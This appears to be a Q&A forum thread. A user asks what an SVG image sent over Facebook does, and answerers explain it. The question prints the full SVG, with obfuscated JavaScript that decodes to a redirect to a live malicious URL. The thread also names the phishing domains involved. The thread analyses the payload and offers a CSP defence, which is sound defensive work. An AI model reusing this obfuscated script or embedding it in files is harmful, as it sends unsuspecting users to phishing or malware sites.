Malicious javascript embeded in SVG - what it does?

Asked 20/11, 2016 at 22:54 Answered 6/7 at 23:57

javascript windows facebook google-chrome svg

I recieved facebook message with two files (SVG pictures), and I clicked one of them (I do not know why :( ). Then new tab with red dot opened, and then I was immediately redirected to some site pretending to look like Youtube (http://kerman.pw/?fb_dsa).

Then I downloaded the .svg file using the "Save link as..." function. It seems it is some javascript code embeeded into svg, so I am posting it here (I do not know JS very well):

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function xcxxy(gyqbv,hzrgh,ktjrf){
      var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
      var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
      var bnkdip = "";
      var igrqm = 0;
      while(vyqsvo[igrqm]){
        igrqm++;
      }
      var kwwtmh = 0;
      while(gyqbv[kwwtmh]){
        var jikaig = 0;
        var axfnq = -1;
        while(qixua[jikaig]){
          if(qixua[jikaig] == gyqbv[kwwtmh]){
            axfnq = jikaig;
            break;
          }
          jikaig++;
        }
        if(axfnq >= 0){
          var abxnk = 0;
          var wjtfca = -1;
          while(vyqsvo[kwwtmh%igrqm][abxnk]){
            if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
              wjtfca = abxnk;
              break;
            }
          abxnk++;
          }
          bnkdip += qixua[wjtfca];
        }else{
          bnkdip += gyqbv[kwwtmh];
        }
        kwwtmh++;
      }
      var evhrt = "";
      for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
        evhrt += bnkdip[izqfrv];
      }
      bnkdip = evhrt;
      return bnkdip;
    }
  var obejok = window;
  var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
  var leizjp = xcxxy("kBB?5S:Uh",1,false);
  var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
  obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
  ]]></script>
</svg>

I don't really know javascript, and I wanted to ask what it can do. Could it hurt me? Thank you very much

Luminal answered 20/11, 2016 at 22:54 Comment(6)

Don't you have that "Youtube look alike" in your browser history? – Sweater 20/11, 2016 at 23:2

window.top.location.href = "http://mourid.com/php/trust.php", causing your browser to navigate to that address, which redirects you to various others. The script on its own can't hurt you, but using the site it ultimately takes you to may. Imitating Youtube, it may be trying to phish for your credentials or may try to serve a file that isn't a video. – Utah 20/11, 2016 at 23:18

@JimmyAdaro yes, I found it. it is: http://kerman.pw/?fb_dsa . – Luminal 21/11, 2016 at 8:19

Can I ask why the downvote - so I can avoid it in the future? – Luminal 21/11, 2016 at 8:23

I also found some information about it, it seem it is new threat. in English: bartblaze.blogspot.cz/2016/11/… in Polish (but google translates it well): niebezpiecznik.pl/post/… – Luminal 21/11, 2016 at 8:41

FYI - if you serve user-uploaded SVGs from your own domain (which maybe you shouldn't), sending the header Content-Security-Policy:default-src *; would say to the browser "you can load scripts, images, or whatever else from any URL you want, but don't execute inline code in <script> tags". It's a very (probably overly) permissive CSP, but would prevent malicious SVGs from doing damage. See content-security-policy.com – Peril 7/3, 2017 at 14:49

You are correct that the SVG file has embedded javascript. SVG's are Vector graphic files which will draw a image in the browser based on the instructions inside the file. The SVG you found contains obfuscated javascript to hide what is actually going on.

At a glance from what I can see, it is a script to open a new browser window and load a new URL, so by itself, it is not dangerous, it all depends on what website it is redirecting you to, and what scripts are set to kick off when you reach the website.

So in short, it CAN harm your computer given the assumption that the site you're being redirected to is malicious.

I hope that helps.

Palmary answered 20/11, 2016 at 23:19 Comment(0)

The embedded script redirects your browser to the website http://mourid.com/php/trust.php, but the script alone is not malicious. The function xcxxy decodes obfuscated strings, and the final line of code is an obfuscated version of window["top"]["location"]["href"] = "http://mourid.com/php/trust.php", which redirects you to that site. I advise you not to run the script because obfuscation is sometimes used to hide malicious code from plain sight. (Source: Wikipedia)

Nicolette answered 6/7 at 23:57 Comment(0)

Recommended topics

Hot tags